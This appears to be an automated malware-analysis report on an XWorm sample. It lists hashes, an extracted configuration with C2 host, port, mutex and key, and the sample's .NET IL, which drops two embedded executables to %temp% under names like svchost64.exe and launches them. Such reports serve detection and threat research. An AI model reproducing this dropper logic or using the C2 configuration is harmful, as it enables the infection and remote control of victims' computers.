Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 57f12202d24edea1d98cc4ffcbd6b9c6
|
| Sha1 | 65b2a84fdb30e0a1e94c2b2ae1c75093093c77a0
|
| Sha256 | c7f4e1aba81ad7714da4487dd279cc886b50428116b614c9ebe246d937c478f0
|
| Sha384 | da45f6c6b25a5984dbcef1a2820f10a9ed7a77398d13c827f928080332f946b36d821ff7b82724ca42a7b894e8e73c72
|
| Sha512 | 1ba7f140a070a166e1e3b05df9a26102376ef1f11b94e6fd4004ba4f603a0321603c4070caf6f6293fb6bbff8d7212f60c80501d8828fb13ceee942b6caa609f
|
| SSDeep | 98304:nb32noKQfZrHVbfub6nloi8DbTqgIWKm77LrwkEpX:nDpb+6l2DagIeLsl
|
| TLSH | 6A36D0017B958D01E16A1B36C2BB4504777BAC425672FF0B79A876AD1D2E3C3AC18F87
|
PeID
|
Config. Field0 | Value |
|---|---|
| Mutex | Rx6I6TBczb3u2uDI |
| Hosts | tcp.cloudpub.ru |
| Port | 54193 |
| KEY | <wallacy2k> |
| USBNM | <Xwormmm> |
| LoggerPath | %Public% |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\Professor\Desktop\BitJoiner\payload\obj\Debug\payload.pdb |
| Module Name | payload.exe |
| Full Name | payload.exe |
| EntryPoint | System.Void payload.Main::Main() |
| Scope Name | payload.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | payload |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 6 |
| Main Method | System.Void payload.Main::Main() |
| Main IL Instruction Count | 189 |
| Main IL | nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 brtrue.s IL_000E: ldloc.1 br IL_010C: nop ldloc.1 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.0 <null> ldloc.0 <null> ldc.i4.0 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) stloc.s V_4 ldloc.1 <null> ldloc.1 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4 150 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 9 box System.Int32 ldloc.s V_4 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::XorObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) stloc.1 <null> ldloc.0 <null> ldc.i4.s 10 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) ldloc.3 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.4 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::IntDivideObject(System.Object,System.Object) stloc.2 <null> ldloc.2 <null> ldc.i4.1 <null> box System.Int32 ldloc.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4.s 15 box System.Int32 ldloc.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::SubtractObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> ldloc.s V_6 ldc.i4.0 <null> box System.Int32 ldloc.1 <null> ldc.i4.1 <null> box System.Int32 ldloca.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForLoopInitObj(System.Object,System.Object,System.Object,System.Object,System.Object&,System.Object&) brfalse.s IL_010C: nop ldloc.2 <null> ldloc.0 <null> ldloc.2 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ModObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> br.s IL_00F6: ldloc.2 ldloc.2 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> nop <null> br.s IL_00FE: nop nop <null> ldloc.2 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue.s IL_00E5: ldloc.2 nop <null> ldloc.s V_6 ldloc.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForNextCheckObj(System.Object,System.Object,System.Object&) brtrue.s IL_00D5: ldloc.2 nop <null> ldloc.s V_5 brtrue.s IL_0119: nop ldc.i4.1 <null> stloc.s V_5 br IL_0004: nop nop <null> br IL_01BF: ldloc.s V_5 ldstr %temp%\ call System.String System.Environment::ExpandEnvironmentVariables(System.String) stloc.s V_7 nop <null> ldloc.s V_7 ldstr svchost64.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_8 ldloc.s V_7 ldstr \explorer64.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_9 ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldloc.s V_8 ldloc.s V_8 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_016F: nop ldloc.s V_8 call System.Byte[] payload.My.Resources.Resources::get__1() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0181: ldloc.s V_9 ldloc.s V_9 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0197: nop ldloc.s V_9 call System.Byte[] payload.My.Resources.Resources::get__2() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_01BA: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BA: nop nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.2 <null> ldc.i4.0 <null> box System.Int32 ldc.i4.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::CompareObjectEqual(System.Object,System.Object,System.Boolean) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::NotObject(System.Object) call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.0 <null> ldc.i4.s 50 box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldc.i4.1 <null> box System.Boolean br.s IL_020E: nop ldc.i4.0 <null> box System.Boolean nop <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue IL_011F: ldstr "%temp%\\" nop <null> ret <null> |
| Module Name | payload.exe |
| Full Name | payload.exe |
| EntryPoint | System.Void payload.Main::Main() |
| Scope Name | payload.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | payload |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 6 |
| Main Method | System.Void payload.Main::Main() |
| Main IL Instruction Count | 189 |
| Main IL | nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 brtrue.s IL_000E: ldloc.1 br IL_010C: nop ldloc.1 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.0 <null> ldloc.0 <null> ldc.i4.0 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) stloc.s V_4 ldloc.1 <null> ldloc.1 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4 150 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 9 box System.Int32 ldloc.s V_4 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::XorObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) stloc.1 <null> ldloc.0 <null> ldc.i4.s 10 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) ldloc.3 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.4 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::IntDivideObject(System.Object,System.Object) stloc.2 <null> ldloc.2 <null> ldc.i4.1 <null> box System.Int32 ldloc.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4.s 15 box System.Int32 ldloc.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::SubtractObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> ldloc.s V_6 ldc.i4.0 <null> box System.Int32 ldloc.1 <null> ldc.i4.1 <null> box System.Int32 ldloca.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForLoopInitObj(System.Object,System.Object,System.Object,System.Object,System.Object&,System.Object&) brfalse.s IL_010C: nop ldloc.2 <null> ldloc.0 <null> ldloc.2 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ModObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> br.s IL_00F6: ldloc.2 ldloc.2 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> nop <null> br.s IL_00FE: nop nop <null> ldloc.2 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue.s IL_00E5: ldloc.2 nop <null> ldloc.s V_6 ldloc.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForNextCheckObj(System.Object,System.Object,System.Object&) brtrue.s IL_00D5: ldloc.2 nop <null> ldloc.s V_5 brtrue.s IL_0119: nop ldc.i4.1 <null> stloc.s V_5 br IL_0004: nop nop <null> br IL_01BF: ldloc.s V_5 ldstr %temp%\ call System.String System.Environment::ExpandEnvironmentVariables(System.String) stloc.s V_7 nop <null> ldloc.s V_7 ldstr svchost64.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_8 ldloc.s V_7 ldstr \explorer64.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_9 ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldloc.s V_8 ldloc.s V_8 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_016F: nop ldloc.s V_8 call System.Byte[] payload.My.Resources.Resources::get__1() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0181: ldloc.s V_9 ldloc.s V_9 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0197: nop ldloc.s V_9 call System.Byte[] payload.My.Resources.Resources::get__2() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_01BA: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BA: nop nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.2 <null> ldc.i4.0 <null> box System.Int32 ldc.i4.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::CompareObjectEqual(System.Object,System.Object,System.Boolean) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::NotObject(System.Object) call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.0 <null> ldc.i4.s 50 box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldc.i4.1 <null> box System.Boolean br.s IL_020E: nop ldc.i4.0 <null> box System.Boolean nop <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue IL_011F: ldstr "%temp%\\" nop <null> ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | Rx6I6TBczb3u2uDI |
| CnC | tcp.cloudpub.ru |
| Port | 54193 |
|
Config. Field0 | Value |
|---|---|
| Mutex | Rx6I6TBczb3u2uDI |
| Hosts | tcp.cloudpub.ru |
| Port | 54193 |
| KEY | <wallacy2k> |
| USBNM | <Xwormmm> |
| LoggerPath | %Public% |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | Rx6I6TBczb3u2uDI Malicious |
57f12202d24edea1d98cc4ffcbd6b9c6 > .Net Resources > payload.Resources.resources > _1 > .Net Resources > payload.Resources.resources > _2 |
| CnC | tcp.cloudpub.ru Malicious |
57f12202d24edea1d98cc4ffcbd6b9c6 > .Net Resources > payload.Resources.resources > _1 > .Net Resources > payload.Resources.resources > _2 |
| Port | 54193 Malicious |
57f12202d24edea1d98cc4ffcbd6b9c6 > .Net Resources > payload.Resources.resources > _1 > .Net Resources > payload.Resources.resources > _2 |